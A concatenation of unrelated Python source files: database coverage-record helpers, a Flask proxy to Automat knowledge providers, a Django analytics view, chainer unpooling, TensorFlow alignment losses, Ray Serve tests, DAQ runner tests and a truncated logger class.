status=BaseCoverageRecord.SUCCESS, exception=None, collection=None,
force=False,
):
"""Create and update CoverageRecords so that every Identifier in
`identifiers` has an identical record.
"""
from identifier import Identifier
if not identifiers:
# Nothing to do.
return
_db = Session.object_session(identifiers[0])
timestamp = timestamp or datetime.datetime.utcnow()
identifier_ids = [i.id for i in identifiers]
equivalent_record = and_(
cls.operation==operation,
cls.data_source==data_source,
cls.collection==collection,
)
updated_or_created_results = list()
if force:
# Make sure that works that previously had a
# CoverageRecord for this operation have their timestamp
# and status updated.
update = cls.__table__.update().where(and_(
cls.identifier_id.in_(identifier_ids),
equivalent_record,
)).values(
dict(timestamp=timestamp, status=status, exception=exception)
).returning(cls.id, cls.identifier_id)
updated_or_created_results = _db.execute(update).fetchall()
already_covered = _db.query(cls.id, cls.identifier_id).filter(
equivalent_record,
cls.identifier_id.in_(identifier_ids),
).subquery()
# Make sure that any identifiers that need a CoverageRecord get one.
# The SELECT part of the INSERT...SELECT query.
data_source_id = data_source.id
collection_id = None
if collection:
collection_id = collection.id
new_records = _db.query(
Identifier.id.label('identifier_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status'),
literal(exception, type_=Unicode).label('exception'),
literal(data_source_id, type_=Integer).label('data_source_id'),
literal(collection_id, type_=Integer).label('collection_id'),
).select_from(Identifier).outerjoin(
already_covered, Identifier.id==already_covered.c.identifier_id,
).filter(already_covered.c.id==None)
new_records = new_records.filter(Identifier.id.in_(identifier_ids))
# The INSERT part.
insert = cls.__table__.insert().from_select(
[
literal_column('identifier_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
literal_column('exception'),
literal_column('data_source_id'),
literal_column('collection_id'),
],
new_records
).returning(cls.id, cls.identifier_id)
inserts = _db.execute(insert).fetchall()
updated_or_created_results.extend(inserts)
_db.commit()
# Default return for the case when all of the identifiers were
# ignored.
new_records = list()
ignored_identifiers = identifiers
new_and_updated_record_ids = [r[0] for r in updated_or_created_results]
impacted_identifier_ids = [r[1] for r in updated_or_created_results]
if new_and_updated_record_ids:
new_records = _db.query(cls).filter(cls.id.in_(
new_and_updated_record_ids
)).all()
ignored_identifiers = filter(
lambda i: i.id not in impacted_identifier_ids, identifiers
)
return new_records, ignored_identifiers
Index("ix_coveragerecords_data_source_id_operation_identifier_id", CoverageRecord.data_source_id, CoverageRecord.operation, CoverageRecord.identifier_id)
class WorkCoverageRecord(Base, BaseCoverageRecord):
"""A record of some operation that was performed on a Work.
This is similar to CoverageRecord, which operates on Identifiers,
but since Work identifiers have no meaning outside of the database,
we presume that all the operations involve internal work only,
and as such there is no data_source_id.
"""
__tablename__ = 'workcoveragerecords'
CHOOSE_EDITION_OPERATION = u'choose-edition'
CLASSIFY_OPERATION = u'classify'
SUMMARY_OPERATION = u'summary'
QUALITY_OPERATION = u'quality'
GENERATE_OPDS_OPERATION = u'generate-opds'
GENERATE_MARC_OPERATION = u'generate-marc'
UPDATE_SEARCH_INDEX_OPERATION = u'update-search-index'
id = Column(Integer, primary_key=True)
work_id = Column(Integer, ForeignKey('works.id'), index=True)
operation = Column(String(255), index=True, default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
__table_args__ = (
UniqueConstraint('work_id', 'operation'),
)
def __repr__(self):
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
template = '<WorkCoverageRecord: work_id=%s operation="%s" timestamp="%s"%s>'
return template % (
self.work_id, self.operation,
self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
exception
)
@classmethod
def lookup(self, work, operation):
_db = Session.object_session(work)
return get_one(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, work, operation, timestamp=None,
status=CoverageRecord.SUCCESS):
_db = Session.object_session(work)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
@classmethod
def bulk_add(self, works, operation, timestamp=None,
status=CoverageRecord.SUCCESS, exception=None):
"""Create and update WorkCoverageRecords so that every Work in
`works` has an identical record.
"""
from work import Work
if not works:
# Nothing to do.
return
_db = Session.object_session(works[0])
timestamp = timestamp or datetime.datetime.utcnow()
work_ids = [w.id for w in works]
# Make sure that works that previously had a
# WorkCoverageRecord for this operation have their timestamp
# and status updated.
update = WorkCoverageRecord.__table__.update().where(
and_(WorkCoverageRecord.work_id.in_(work_ids),
WorkCoverageRecord.operation==operation)
).values(dict(timestamp=timestamp, status=status, exception=exception))
_db.execute(update)
# Make sure that any works that are missing a
# WorkCoverageRecord for this operation get one.
# Works that already have a WorkCoverageRecord will be ignored
# by the INSERT but handled by the UPDATE.
already_covered = _db.query(WorkCoverageRecord.work_id).select_from(
WorkCoverageRecord).filter(
WorkCoverageRecord.work_id.in_(work_ids)
).filter(
WorkCoverageRecord.operation==operation
)
# The SELECT part of the INSERT...SELECT query.
new_records = _db.query(
Work.id.label('work_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status')
).select_from(
Work
)
new_records = new_records.filter(
Work.id.in_(work_ids)
).filter(
~Work.id.in_(already_covered)
)
# The INSERT part.
insert = WorkCoverageRecord.__table__.insert().from_select(
[
literal_column('work_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
],
new_records
)
_db.execute(insert)
Index("ix_workcoveragerecords_operation_work_id", WorkCoverageRecord.operation, WorkCoverageRecord.work_id)
|
py | 1a3f7f189ca12e161b0ad371ae814eb20e56d15b | import copy
import json
import requests
from flask import request
from tranql.backplane.api.standard_api import StandardAPIResource
from tranql.config import config
#######################################################
##
# Automat - query Automat-KPs.
##
#######################################################
class AutomatResource(StandardAPIResource):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.url = config.get("AUTOMAT_URL")
def get_kp_reasoner_api(self, kp_tag):
return f'{self.url}/{kp_tag}/query'
def get_kp_schema_api(self, kp_tag):
return f'{self.url}/{kp_tag}/predicates'
class AutomatSchema(AutomatResource):
def get(self, kp_tag):
"""
Automat Schema
---
tags: [schema]
description: Query schema of kp in automat
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
responses:
'200':
description: Schema
content:
application/json:
schema:
type: object
example:
population_of_individual_organisms:
phenotypic_feature:
- association
named_thing:
- association
activity_and_behavior:
- association
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'"""
url = self.get_kp_schema_api(kp_tag)
response = requests.get(url)
if response.status_code != 200 :
result = {
"status": "error",
"code": "service_invocation_error",
"message": f"Bad Automat response. When getting schema. url: {self.url} \n request: {json.dumps(request.json, indent=2)} "
f"response: \n{response.text}."
}
return result, 500
else:
return response.json()
class AutomatQuery(AutomatResource):
""" Generic graph query to Gamma. """
def post(self, kp_tag):
"""
Automat query
---
tags: [query]
description: Query the Automat KPs.
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
requestBody:
description: Input message
required: true
content:
application/json:
schema:
$ref: '#/definitions/Message'
example:
knowledge_graph:
nodes: []
edges: []
knowledge_maps:
- {}
question_graph:
nodes:
- id: "chemical_substance"
type: "chemical_substance"
curie: "CHEMBL:CHEMBL3"
- id: "disease"
type: "disease"
edges:
- id: "e1"
source_id: "chemical_substance"
target_id: "disease"
options: {}
responses:
'200':
description: Message
content:
application/json:
schema:
$ref: '#/definitions/Message'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
self.validate (request, 'Message')
url = self.get_kp_reasoner_api(kp_tag)
# question_graph should be query graph
question = request.json
question['query_graph'] = copy.deepcopy(question['question_graph'])
del question['question_graph']
del question['knowledge_graph']
del question['knowledge_maps']
response = requests.post(url, json={"message": question})
if response.status_code >= 300:
result = {
"status": "error",
"code": "service_invocation_failure",
"message": f"Bad Automat response. url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
else:
result = self.down_cast_message(response.json())
return self.response(result)
class AutomatRegistry(AutomatResource):
def get(self):
"""
Automat query
---
tags: [query]
description: Query the Automat KPs.
responses:
'200':
description: Message
content:
application/json:
schema:
- 'intact'
- 'ctd'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
response = requests.get(self.url + '/registry')
if response.status_code == 200:
return response.json()
else:
result = {
"status": "error",
"code": "service_invocation_failure",
"message": f"Bad Automat response. Contacting registry url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
return result
|
py | 1a3f80bdf0fc20debb87e3e66331ecb4b28d9da4 | from django.http.response import HttpResponse
from django.views.generic import View
from common.models import OfficerAllegation
from common.json_serializer import JSONSerializer
from allegation.services.outcome_analytics import OutcomeAnalytics
from allegation.query_builders import OfficerAllegationQueryBuilder
class OfficerAllegationAnalysisAPIView(View):
def __init__(self, **kwargs):
super(OfficerAllegationAnalysisAPIView, self).__init__(**kwargs)
def get_officer_allegations(self, request, ignore_filters=None):
queries = OfficerAllegationQueryBuilder()\
.build(request.GET, ignore_filters)
return OfficerAllegation.objects.filter(queries)
def get(self, request):
officer_allegations = self.get_officer_allegations(request)
analytics = OutcomeAnalytics.get_analytics(officer_allegations)
content = JSONSerializer().serialize({
'analytics': analytics
})
return HttpResponse(content)
|
py | 1a3f81179653f8fb7108807af9e3d0cfffb07ce8 | # python3
from .compression import compress_jpeg
from .decompression import decompress_jpeg
|
py | 1a3f8199a9e5c7b14ca1e87b4ea24dc079498e23 | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django.urls import reverse
class Post(models.Model):
image = models.ImageField(upload_to='images/')
caption = models.TextField()
date_posted = models.DateTimeField(default=timezone.now)
author = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.caption
def get_absolute_url(self):
return reverse('post_detail', kwargs={'pk': self.pk})
# comment
class Comment(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments')
comment = models. CharField(max_length=140,null=True, blank = False)
author = models.ForeignKey(User,on_delete=models.CASCADE)
def __str__(self):
return self.comment
def get_absolute_url(self):
return reverse("post_list")
|
py | 1a3f81dbd446dfd24f7826ad5263aecc91694fba | from chainer import cuda
from chainer.functions.pooling import pooling_2d
from chainer.utils import conv
from chainer.utils import type_check
class Unpooling2D(pooling_2d.Pooling2D):
"""Unpooling over a set of 2d planes."""
def __init__(self, ksize, stride=None, pad=0,
outsize=None, cover_all=True):
super(Unpooling2D, self).__init__(ksize, stride, pad, cover_all)
self.outh, self.outw = (None, None) if outsize is None else outsize
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(n_in == 1)
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim == 4,
)
if self.outh is not None:
expected_h = conv.get_conv_outsize(
self.outh, self.kh, self.sy, self.ph, cover_all=self.cover_all)
type_check.expect(x_type.shape[2] == expected_h)
if self.outw is not None:
expected_w = conv.get_conv_outsize(
self.outw, self.kw, self.sx, self.pw, cover_all=self.cover_all)
type_check.expect(x_type.shape[3] == expected_w)
def forward(self, x):
h, w = x[0].shape[2:]
if self.outh is None:
self.outh = conv.get_deconv_outsize(
h, self.kh, self.sy, self.ph, cover_all=self.cover_all)
if self.outw is None:
self.outw = conv.get_deconv_outsize(
w, self.kw, self.sx, self.pw, cover_all=self.cover_all)
xp = cuda.get_array_module(*x)
col = xp.tile(x[0][:, :, xp.newaxis, xp.newaxis],
(1, 1, self.kh, self.kw, 1, 1))
if isinstance(x[0], cuda.ndarray):
y = conv.col2im_gpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
else:
y = conv.col2im_cpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
return y,
def backward(self, x, gy):
if isinstance(gy[0], cuda.ndarray):
gcol = conv.im2col_gpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
else:
gcol = conv.im2col_cpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
gx = gcol.sum(axis=(2, 3))
return gx,
def unpooling_2d(x, ksize, stride=None, pad=0, outsize=None, cover_all=True):
"""Inverse operation of pooling for 2d array.
This function acts similarly to :class:`~functions.Deconvolution2D`, but
it spreads input 2d array's value without any parameter instead of
computing the inner products.
Args:
x (~chainer.Variable): Input variable.
ksize (int or pair of ints): Size of pooling window. ``ksize=k`` and
``ksize=(k, k)`` are equivalent.
stride (int, pair of ints or None): Stride of pooling applications.
``stride=s`` and ``stride=(s, s)`` are equivalent. If ``None`` is
specified, then it uses same stride as the pooling window size.
pad (int or pair of ints): Spatial padding width for the input array.
``pad=p`` and ``pad=(p, p)`` are equivalent.
outsize (None or pair of ints): Expected output size (height, width)
of array after the operation. If ``None``, the size
(height or width) is estimated from the size of input array
in first batch with
:func:`~chainer.utils.conv.get_deconv_outsize`.
If outsize is not ``None``, the result of outsize applied to
:func:`~chainer.utils.conv.get_conv_outsize` must be equal to
the shape of the 2d array in the input batch ``x``.
cover_all (bool): If ``True``, all spatial locations are pooled
into some output pixels, and the output size is larger than that
when cover_all is ``False``.
Returns:
~chainer.Variable: Output variable.
"""
return Unpooling2D(ksize, stride, pad, outsize, cover_all)(x)
|
py | 1a3f81eb7e52eeb6821d97f274ef9444e28be2e1 | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Loss functions imposing the cycle-consistency constraints."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
def classification_loss(logits, labels, label_smoothing):
"""Loss function based on classifying the correct indices.
In the paper, this is called Cycle-back Classification.
Args:
logits: Tensor, Pre-softmax scores used for classification loss. These are
similarity scores after cycling back to the starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
label_smoothing: Float, label smoothing factor which can be used to
determine how hard the alignment should be.
Returns:
loss: Tensor, A scalar classification loss calculated using standard softmax
cross-entropy loss.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
return tf.reduce_mean(tf.keras.losses.categorical_crossentropy(
y_true=labels, y_pred=logits, from_logits=True,
label_smoothing=label_smoothing))
def regression_loss(logits, labels, num_steps, steps, seq_lens, loss_type,
normalize_indices, variance_lambda, huber_delta):
"""Loss function based on regressing to the correct indices.
In the paper, this is called Cycle-back Regression. There are 3 variants
of this loss:
i) regression_mse: MSE of the predicted indices and ground truth indices.
ii) regression_mse_var: MSE of the predicted indices that takes into account
the variance of the similarities. This is important when the rate at which
sequences go through different phases changes a lot. The variance scaling
allows dynamic weighting of the MSE loss based on the similarities.
iii) regression_huber: Huber loss between the predicted indices and ground
truth indices.
Args:
logits: Tensor, Pre-softmax similarity scores after cycling back to the
starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
num_steps: Integer, Number of steps in the sequence embeddings.
steps: Tensor, step indices/frame indices of the embeddings of the shape
[N, T] where N is the batch size, T is the number of the timesteps.
seq_lens: Tensor, Lengths of the sequences from which the sampling was done.
This can provide additional temporal information to the alignment loss.
loss_type: String, This specifies the kind of regression loss function.
Currently supported loss functions: regression_mse, regression_mse_var,
regression_huber.
normalize_indices: Boolean, If True, normalizes indices by sequence lengths.
Useful for ensuring numerical instabilities don't arise as sequence
indices can be large numbers.
variance_lambda: Float, Weight of the variance of the similarity
predictions while cycling back. If this is high then the low variance
similarities are preferred by the loss while making this term low results
in high variance of the similarities (more uniform/random matching).
huber_delta: float, Huber delta described in tf.keras.losses.huber_loss.
Returns:
loss: Tensor, A scalar loss calculated using a variant of regression.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
steps = tf.stop_gradient(steps)
if normalize_indices:
float_seq_lens = tf.cast(seq_lens, tf.float32)
tile_seq_lens = tf.tile(
tf.expand_dims(float_seq_lens, axis=1), [1, num_steps])
steps = tf.cast(steps, tf.float32) / tile_seq_lens
else:
steps = tf.cast(steps, tf.float32)
beta = tf.nn.softmax(logits)
true_time = tf.reduce_sum(steps * labels, axis=1)
pred_time = tf.reduce_sum(steps * beta, axis=1)
if loss_type in ['regression_mse', 'regression_mse_var']:
if 'var' in loss_type:
# Variance aware regression.
pred_time_tiled = tf.tile(tf.expand_dims(pred_time, axis=1),
[1, num_steps])
pred_time_variance = tf.reduce_sum(
tf.square(steps - pred_time_tiled) * beta, axis=1)
# Using log of variance as it is numerically stabler.
pred_time_log_var = tf.math.log(pred_time_variance)
squared_error = tf.square(true_time - pred_time)
return tf.reduce_mean(tf.math.exp(-pred_time_log_var) * squared_error
+ variance_lambda * pred_time_log_var)
else:
return tf.reduce_mean(
tf.keras.losses.mean_squared_error(y_true=true_time,
y_pred=pred_time))
elif loss_type == 'regression_huber':
return tf.reduce_mean(tf.keras.losses.huber_loss(
y_true=true_time, y_pred=pred_time,
delta=huber_delta))
else:
raise ValueError('Unsupported regression loss %s. Supported losses are: '
'regression_mse, regresstion_mse_var and regression_huber.'
% loss_type)
|
py | 1a3f846a3d419966f83e37d957a970d717896f97 | import asyncio
import time
import os
import requests
import pytest
import starlette.responses
import ray
from ray import serve
from ray._private.test_utils import SignalActor, wait_for_condition
def test_e2e(serve_instance):
@serve.deployment(name="api")
def function(starlette_request):
return {"method": starlette_request.method}
function.deploy()
resp = requests.get("http://127.0.0.1:8000/api").json()["method"]
assert resp == "GET"
resp = requests.post("http://127.0.0.1:8000/api").json()["method"]
assert resp == "POST"
def test_starlette_response(serve_instance):
@serve.deployment(name="basic")
def basic(_):
return starlette.responses.Response("Hello, world!", media_type="text/plain")
basic.deploy()
assert requests.get("http://127.0.0.1:8000/basic").text == "Hello, world!"
@serve.deployment(name="html")
def html(_):
return starlette.responses.HTMLResponse(
"<html><body><h1>Hello, world!</h1></body></html>"
)
html.deploy()
assert (
requests.get("http://127.0.0.1:8000/html").text
== "<html><body><h1>Hello, world!</h1></body></html>"
)
@serve.deployment(name="plain_text")
def plain_text(_):
return starlette.responses.PlainTextResponse("Hello, world!")
plain_text.deploy()
assert requests.get("http://127.0.0.1:8000/plain_text").text == "Hello, world!"
@serve.deployment(name="json")
def json(_):
return starlette.responses.JSONResponse({"hello": "world"})
json.deploy()
assert requests.get("http://127.0.0.1:8000/json").json()["hello"] == "world"
@serve.deployment(name="redirect")
def redirect(_):
return starlette.responses.RedirectResponse(url="http://127.0.0.1:8000/basic")
redirect.deploy()
assert requests.get("http://127.0.0.1:8000/redirect").text == "Hello, world!"
@serve.deployment(name="streaming")
def streaming(_):
async def slow_numbers():
for number in range(1, 4):
yield str(number)
await asyncio.sleep(0.01)
return starlette.responses.StreamingResponse(
slow_numbers(), media_type="text/plain", status_code=418
)
streaming.deploy()
resp = requests.get("http://127.0.0.1:8000/streaming")
assert resp.text == "123"
assert resp.status_code == 418
def test_deploy_sync_function_no_params(serve_instance):
@serve.deployment()
def sync_d():
return "sync!"
serve.start()
sync_d.deploy()
assert requests.get("http://localhost:8000/sync_d").text == "sync!"
assert ray.get(sync_d.get_handle().remote()) == "sync!"
def test_deploy_async_function_no_params(serve_instance):
@serve.deployment()
async def async_d():
await asyncio.sleep(5)
return "async!"
serve.start()
async_d.deploy()
assert requests.get("http://localhost:8000/async_d").text == "async!"
assert ray.get(async_d.get_handle().remote()) == "async!"
def test_deploy_sync_class_no_params(serve_instance):
@serve.deployment
class Counter:
def __init__(self):
self.count = 0
def __call__(self):
self.count += 1
return {"count": self.count}
serve.start()
Counter.deploy()
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 2}
assert ray.get(Counter.get_handle().remote()) == {"count": 3}
def test_deploy_async_class_no_params(serve_instance):
@serve.deployment
class AsyncCounter:
async def __init__(self):
await asyncio.sleep(5)
self.count = 0
async def __call__(self):
self.count += 1
await asyncio.sleep(5)
return {"count": self.count}
serve.start()
AsyncCounter.deploy()
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 2}
assert ray.get(AsyncCounter.get_handle().remote()) == {"count": 3}
def test_user_config(serve_instance):
@serve.deployment("counter", num_replicas=2, user_config={"count": 123, "b": 2})
class Counter:
def __init__(self):
self.count = 10
def __call__(self, *args):
return self.count, os.getpid()
def reconfigure(self, config):
self.count = config["count"]
Counter.deploy()
handle = Counter.get_handle()
def check(val, num_replicas):
pids_seen = set()
for i in range(100):
result = ray.get(handle.remote())
if str(result[0]) != val:
return False
pids_seen.add(result[1])
return len(pids_seen) == num_replicas
wait_for_condition(lambda: check("123", 2))
Counter = Counter.options(num_replicas=3)
Counter.deploy()
wait_for_condition(lambda: check("123", 3))
Counter = Counter.options(user_config={"count": 456})
Counter.deploy()
wait_for_condition(lambda: check("456", 3))
def test_reject_duplicate_route(serve_instance):
@serve.deployment(name="A", route_prefix="/api")
class A:
pass
A.deploy()
with pytest.raises(ValueError):
A.options(name="B").deploy()
def test_scaling_replicas(serve_instance):
@serve.deployment(name="counter", num_replicas=2)
class Counter:
def __init__(self):
self.count = 0
def __call__(self, _):
self.count += 1
return self.count
Counter.deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
# If the load is shared among two replicas. The max result cannot be 10.
assert max(counter_result) < 10
Counter.options(num_replicas=1).deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
# Give some time for a replica to spin down. But majority of the request
# should be served by the only remaining replica.
assert max(counter_result) - min(counter_result) > 6
def test_delete_deployment(serve_instance):
@serve.deployment(name="delete")
def function(_):
return "hello"
function.deploy()
assert requests.get("http://127.0.0.1:8000/delete").text == "hello"
function.delete()
@serve.deployment(name="delete")
def function2(_):
return "olleh"
function2.deploy()
for _ in range(10):
try:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
break
except AssertionError:
time.sleep(0.5) # Wait for the change to propagate.
else:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
def test_starlette_request(serve_instance):
@serve.deployment(name="api")
async def echo_body(starlette_request):
data = await starlette_request.body()
return data
echo_body.deploy()
# Long string to test serialization of multiple messages.
UVICORN_HIGH_WATER_MARK = 65536 # max bytes in one message
long_string = "x" * 10 * UVICORN_HIGH_WATER_MARK
resp = requests.post("http://127.0.0.1:8000/api", data=long_string).text
assert resp == long_string
def test_start_idempotent(serve_instance):
@serve.deployment(name="start")
def func(*args):
pass
func.deploy()
assert "start" in serve.list_deployments()
serve.start(detached=True)
serve.start()
serve.start(detached=True)
serve.start()
assert "start" in serve.list_deployments()
def test_shutdown_destructor(serve_instance):
signal = SignalActor.remote()
@serve.deployment
class A:
def __del__(self):
signal.send.remote()
A.deploy()
A.delete()
ray.get(signal.wait.remote(), timeout=10)
# If the destructor errored, it should be logged but also cleaned up.
@serve.deployment
class B:
def __del__(self):
raise RuntimeError("Opps")
B.deploy()
B.delete()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
|
py | 1a3f846da97e05ca19c2abc542f6bea97ff8b465 | """Unit tests for configurator"""
import unittest
import sys
import os
import time
from unittest.mock import MagicMock, mock_open, patch
from forch.proto.shared_constants_pb2 import PortBehavior
from forch.proto.devices_state_pb2 import DevicePortEvent
from daq.runner import DAQRunner, configurator, PortInfo
from daq.host import ConnectedHost
import network
import logging
logger = logging.getLogger()
logger.level = logging.INFO
stream_handler = logging.StreamHandler(sys.stdout)
logger.addHandler(stream_handler)
class TestRunner(unittest.TestCase):
"""Test class for Configurator"""
config = {
'monitor_scan_sec' : '30',
'default_timeout_sec' : '350',
'base_conf' : 'resources/setups/baseline/base_config.json',
'site_path' : 'local/site/',
'initial_dhcp_lease_time' : '120s',
'dhcp_lease_time' : '500s',
'long_dhcp_response_sec' : '105'
}
def setUp(self):
os.environ = {
**os.environ,
"DAQ_VERSION": "",
"DAQ_LSB_RELEASE": "",
"DAQ_SYS_UNAME": ""
}
configurator.Configurator.load_and_merge = MagicMock(return_value={})
network.TestNetwork.__init__ = MagicMock(return_value=None)
DAQRunner._get_test_metadata = MagicMock(return_value={})
with patch("builtins.open", mock_open(read_data="a: b")):
self.runner = DAQRunner(self.config)
def test_reap_stale_ports(self):
"""Test port flap timeout config override"""
self.runner.target_set_error = MagicMock()
device = self.runner._devices.new_device("0000000000", None)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
ConnectedHost.__init__ = MagicMock(return_value=None)
host = ConnectedHost()
host.test_name = "test_test"
device.port.flapping_start = time.time() - 1
device.host = host
host.get_port_flap_timeout = MagicMock(return_value=10000)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
host.get_port_flap_timeout = MagicMock(return_value=None)
self.runner._reap_stale_ports()
host.get_port_flap_timeout.assert_called_with(host.test_name)
self.runner.target_set_error.assert_called()
def test_reap_stale_ports_with_remote_ports(self):
"""Test device learn on vlan trigger"""
self.runner.target_set_error = MagicMock()
device = self.runner._devices.new_device("0000000000", None)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
ConnectedHost.__init__ = MagicMock(return_value=None)
host = ConnectedHost()
host.test_name = "test_test"
device.host = host
host.get_port_flap_timeout = MagicMock(return_value=10000)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.up)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
host.get_port_flap_timeout = MagicMock(return_value=None)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down)
self.runner._handle_remote_port_state(device, mock_port_event)
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.up)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
self.runner.target_set_error.assert_not_called()
mock_port_event = DevicePortEvent(timestamp="1", event=PortBehavior.PortEvent.down)
self.runner._handle_remote_port_state(device, mock_port_event)
self.runner._reap_stale_ports()
host.get_port_flap_timeout.assert_called_with(host.test_name)
self.runner.target_set_error.assert_called()
if __name__ == '__main__':
unittest.main()
|
py | 1a3f84b9501ecc7ef1b85c932c96d89b8a2e45db | #!/usr/bin/env python3
# IMPORTS
# system
import sys, time
from copy import copy
from collections import defaultdict
import pdb
# math
import numpy as np
from scipy.spatial.transform import Rotation as R
# ros
from utils import *
class RaptorLogger:
"""
This helper class writes to /reads from log files.
* save_elms is a class var that defines what variables will be in the log files. There are different ones for estimation, ground truth, ssp, and params
* to write, the user will pass in an object name and a dict with keys corresponding to the second element of each tuple in save_elms
* to read the user gives the object name, and a dict is passed back
* params are treated slightly differently, with their own read/write functions
"""
def __init__(self, mode="write", names=None, base_path="./", b_ssp=False):
self.names = names
self.base_path = base_path
self.b_ssp = b_ssp
self.save_elms = {}
self.log_data = defaultdict(dict)
self.fh = None
self.fn = None
self.prm_fn = self.base_path + '_prms.log'
self.save_elms['est'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int))
('Ado State Est', 'state_est', 13),
('Ego State Est', 'ego_state_est', 13),
('3D Corner Est (X|Y|Z)', 'corners_3d_est', 8*3),
('Corner 2D Projections Est (r|c)', 'proj_corners_est', 8*2),
('Angled BB (r|c|w|h|ang_deg)', 'abb', 5),
('Image Segmentation Mode', 'im_seg_mode', 1)]
self.save_elms['gt'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int))
('Ado State GT', 'state_gt', 13),
('Ego State GT', 'ego_state_gt', 13),
('3D Corner GT (X|Y|Z)', 'corners_3d_gt', 8*3),
('Corner 2D Projections GT (r|c)', 'proj_corners_gt', 8*2),
('Angled BB (r|c|w|h|ang_deg)', 'abb', 5),
('Image Segmentation Mode', 'im_seg_mode', 1)]
self.save_elms['ssp'] = [('Time (s)', 'time', 1), # list of tuples ("HEADER STRING", "DICT KEY STRING", # OF VALUES (int))
('Ado State GT', 'state_gt', 13),
('Ado State Est', 'state_est', 13),
('Ego State Est', 'ego_state_est', 13),
('Ego State GT', 'ego_state_gt', 13),
('3D Corner Est (X|Y|Z)', 'corners_3d_gt', 8*3),
('3D Corner GT (X|Y|Z)', 'corners_3d_gt', 8*3),
('Corner 2D Projections Est (r|c)', 'proj_corners_est', 8*2),
('Corner 2D Projections GT (r|c)', 'proj_corners_gt', 8*2)]
if not b_ssp:
self.modes = ['est', 'gt']
else:
self.modes = ['ssp']
if mode=="read":
self.init_read()
elif mode=="write":
if names is None:
raise RuntimeError("Must provide list of names for tracked object")
self.init_write()
else:
raise RuntimeError("Unrecognized logging mode")
def init_write(self):
all_name_str = ''
for n in self.names:
all_name_str += (n + ' ')
all_name_str = all_name_str[:-1]
